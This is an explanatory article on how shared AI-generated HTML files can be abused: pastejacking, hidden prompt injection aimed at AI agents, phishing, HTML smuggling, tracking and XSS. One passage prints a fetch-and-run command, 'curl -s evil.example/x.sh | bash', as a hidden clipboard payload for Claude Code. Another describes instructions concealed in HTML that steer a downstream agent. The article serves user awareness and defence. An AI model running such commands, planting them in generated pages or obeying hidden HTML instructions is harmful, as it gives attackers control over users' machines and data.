Article
Evil things HTML can do to you
There's nothing wrong with sharing around a harmless HTML file generated by Claude, right?
Last week I wrote about how everyone is a coder now, and why that might be a risk that’s almost as scary as Anthropic’s Mythos model.
A few days earlier, an Anthropic engineer made the case for asking AI to produce HTML instead of Markdown: richer explanations, interactive widgets, nicer diagrams, self-contained files anyone can open in a browser. The examples page has generated HTML artifacts covering PR reviews, reports, decks and little custom editors. Simon Willison called the idea thought-provoking.
I can see the appeal, but I also find it worrying - I’m no web security expert but it just doesn’t sit right.
I asked Claude and ChatGPT to help me research exactly why normalising HTML as a standalone deliverable may be a bad idea. What follows is a heavily edited result of that research.
The first risk is the habit
Writing an HTML file used to be a relatively difficult task. You did not generally see raw HTML passed around like a Word doc, a PDF, or a spreadsheet.
Now, anyone can ask Claude for a “quick tool”, get back a neat-looking HTML file, and send it to friends or colleagues who will happily open it.
That matters because social factors are almost always a bigger attack surface than technical ones.
Open the file. Click the button. Copy the prompt. Paste the command into Terminal. Drag in a spreadsheet. Give it a folder. Follow the login link. Click Allow.
To a technical person, each of those steps has a risk profile. To someone who has never read or written HTML, they are just instructions in a friendly little app that appeared in their browser.
That is the part that worries me. AI-generated HTML makes unfamiliar behaviour feel routine. It trains people to treat an executable web page from an unknown origin as a document.
The most dangerous version of this is the one that feels useful. A helpful-looking file says “copy this into Claude Code” or “paste this in Terminal”, and the whole interaction looks like productivity. The trap works because you take the final step yourself.
Copy buttons are an attack surface
A copy button does not have to copy the text you can see.
That is pastejacking: a page asks you to copy one thing while putting something else on your clipboard. The visible button might say “copy this command”. The clipboard can contain a different command, extra flags, a hidden newline, or a second instruction you did not inspect before pasting.
Here is a concrete version. A page shows a tidy code block -
Summarise today's standup notes- with a “Copy prompt” button beside it. You click copy, switch to your terminal where Claude Code is running, and paste. What actually lands is two lines:
! curl -s evil.example/x.sh | bash
Summarise today's standup notesThe leading ! tells Claude Code to run the first line as a shell command before the model ever sees the prompt. You pressed paste and ran a remote script. Nothing on the page lied in a way you could see.
This is not new. What is new is the audience. AI-generated HTML can put copy buttons in front of people who do not know that a clipboard is something a page can write to. It can ask them to paste into tools they do not understand. It can wrap that request in the language of help: “run this fix”, “copy this prompt”, “paste this into your agent”.
Once that pattern feels normal, the user’s own hands become part of the exploit chain.
The file can talk to the next AI
HTML is also a good hiding place for text a person will never read.
It can hide instructions in comments, invisible elements, off-screen blocks, accessibility labels and zero-width Unicode characters. JavaScript can assemble the interesting part only when the page is rendered, so a basic scan of the file may miss it.
You may not see any of that. An AI asked to summarise, edit, translate or reuse the file might. A harmless-looking report can carry indirect prompt injection: instructions aimed at the next model, not at you.
If that model is writing a summary, the damage may be limited. If it is an agent with access to your codebase, browser, email, files or terminal, the HTML file has become a way to steer a tool with real permissions.
This is the same broad problem as the copy button, but one step removed. The file does not need to trick you into pasting the hidden instruction. It can wait for you to hand the file to an AI that reads more than you do.
The file can be swapped after trust is established
There is another risk here that is less exotic and more human.
Imagine a useful HTML tool gets shared around a team. It starts as something innocent: a little report viewer, a decision calculator, a demo deck, a project checklist. People open it because Alice sent it, and Alice opens it because Ben sent it, and Ben opens it because the first version was genuinely useful.
Then one copy changes. A shared drive is compromised. A download link is replaced. Someone “improves” the file with a new script they do not understand. A model regenerates it and accidentally includes a token, an internal URL, or a dangerous instruction. The next version looks like the old version, because that is the point. It still opens in the browser. It still has the same buttons. It still feels like the thing people have already decided is safe.
That is when all the boring old web risks get a much easier route in.
It can still phish you
A local HTML file can look like a login page, a browser warning, a Microsoft support alert, or a “security check”.
Password managers help, because they usually refuse to autofill credentials into the wrong origin. A page can still say “your session expired” and send you to a live phishing site. More advanced phishing kits, such as Tycoon 2FA, proxy the real login and steal the session after you complete MFA.
HTML can also draw fake windows inside the browser. The browser-in-the-browser trick is just HTML and CSS pretending to be a real login popup, complete with a fake address bar. Browser-locker scams use fullscreen mode, alert loops and scary copy to make people believe their machine is trapped on a support page.
It can run code and move data
HTML can run JavaScript, load images, submit forms, open links, play media, ask for permissions and download files.
One common malware delivery trick is HTML smuggling: the page carries an encoded blob and rebuilds the real download inside your browser. Email and network filters may only see an innocent-looking HTML attachment. You still have to open the final file, and tools like SmartScreen may still intervene, but the page has already got the payload past a lot of defences.
HTML that uses SVG images can also be problematic. An SVG is a document format and can contain script when opened directly. Attackers have used malicious SVG attachments as self-contained phishing pages.
There are also plain old browser bugs. A crafted page can sometimes trigger a vulnerability in a browser. Social engineering is the likelier route, and modern browsers are heavily sandboxed, but “just open it in a browser” still involves opening it in a very complex piece of software.
It can phone home
An HTML file can report that you opened it without running any JavaScript. One remote image, font, stylesheet, iframe or script is enough to make your browser contact a server. That request can reveal your IP address, rough location, browser details and the time you opened the file.
With JavaScript, the page can also fingerprint your device, submit anything you type into a form, or send a small packet of data as you close the tab. The EFF’s Cover Your Tracks project is a good demonstration of how much a browser can reveal without a login.
Browsers put real walls around local files. But if an HTML file persuades you to drag in a document, choose a folder, paste a secret, click Allow on a permission prompt, or follow a link to a live site, you have given it something to work with.
That is why normalising HTML as a delivery format matters. It makes the risky behaviours around the file feel normal too.
It can ask other apps for help
Links can point beyond websites. A page can try to open mailto:, tel:, Zoom, Slack, VS Code, Microsoft Office and other app-specific links. Windows has had examples of this, including abuses of protocol handlers such as search-ms: and ms-msdt:.
Modern browsers usually show prompts before handing off to another app, which helps. The prompt is much weaker once the page has already convinced you that clicking “Open” is the next sensible step.
Hosted HTML gets more dangerous
Everything above can start with a file on disk. A second class of problems appears once the HTML is served from a real website, or injected into a website you already trust.
A hosted page can register a service worker, which can persist for that origin and intercept later requests. It can become a progressive web app, ask for notifications, and sit on your desktop looking less like a tab and more like software.
It can also exploit server mistakes. Bad CORS settings, careless WebSocket origin checks, cross-site leaks and CSRF all live in the messy boundary between “this page is separate” and “your browser is already logged into something else”. These are old web problems, but AI-generated HTML makes it easier to produce polished pages without anyone thinking through where they will be hosted or what origin they will run under.
The nastiest case is generated HTML landing inside an app you already trust. Then the script may inherit that app’s access to local storage, session data and private page contents. Web security people call this cross-site scripting (XSS), and AI is very good at casually producing the kind of innerHTML-heavy code that creates it.
Wrap up
My issue is not that Claude’s HTML artifacts are inherently dangerous. Most of them will be exactly what they appear to be: useful little files.
The problem is the new reflex. We are teaching people to accept raw HTML from unknown provenance, open it locally, click its buttons, paste its output into powerful tools, and share the result onwards. Many of those people cannot read the file they are trusting. They cannot tell whether Claude has dropped in an API key, a confidential endpoint, a hidden prompt, or a script from somewhere strange. They only know that the page looks polished and the model said it was done.
That is not the same as creating production code. It is not the same as publishing a safe tool. It is a web page with code in it, running inside one of the most capable pieces of software on your computer, asking for your trust.
We should be slower to give it.
Appendix: the long version
This is the part I cut from the main piece. You do not need to know every name here. The point is the spread: opening, copying from, hosting, embedding or reusing an HTML file touches a lot of old security problems at once.
Social engineering and self-attack: pastejacking / ClickFix, Microsoft’s analysis of ClickFix campaigns, FileFix, browser-console self-XSS warnings, browser-in-the-browser phishing, browser-locker scams, clickjacking, and reverse tabnabbing.
AI-specific weirdness: prompt injection, the NCSC’s useful framing that prompt injection is not SQL injection, Simon Willison’s long-running notes on prompt injection, and Embrace The Red on hiding instructions from humans with ASCII smuggling.
Phishing and account theft: Kaspersky on malicious HTML attachments, research on browser autofill leaks, Microsoft’s write-up of Tycoon 2FA, and its note on the Tycoon disruption.
Payloads, downloads and browser code: HTML smuggling, Qakbot using HTML smuggling and downloaders, mark of the web, SVG phishing, KnowBe4 on the rise in malicious SVG attachments, browser bugs triggered by crafted pages, and WebAssembly-based cryptojacking.
Tracking and exfiltration: remote assets and the Referer header, navigator.sendBeacon(), fetch keepalive, WebRTC RTCPeerConnection, WebRTC privacy mitigations in RFC 8828, the EFF’s Cover Your Tracks, third-party cookies, HTML link pings, and speculative loading.
Reaching outside the page: search-ms: abuse, Microsoft’s note on app installer abuse, browser guidance on URL protocol handlers, secure contexts, browser permission prompts, the File System API, and the messy reality of file:// origins.
When the HTML is hosted or injected: service worker abuse, PWA install UX, DNS rebinding against home and office devices, Chrome’s Local Network Access, CORS testing in the OWASP guide, the WebSocket security cheat sheet, XS-Leaks, DOM XSS testing, browser storage testing, CSS-based data exfiltration, and dangling markup injection.
The boring supply-chain stuff: CSRF, third-party JavaScript management, Subresource Integrity, OWASP on vulnerable and outdated components, and Trojan Source.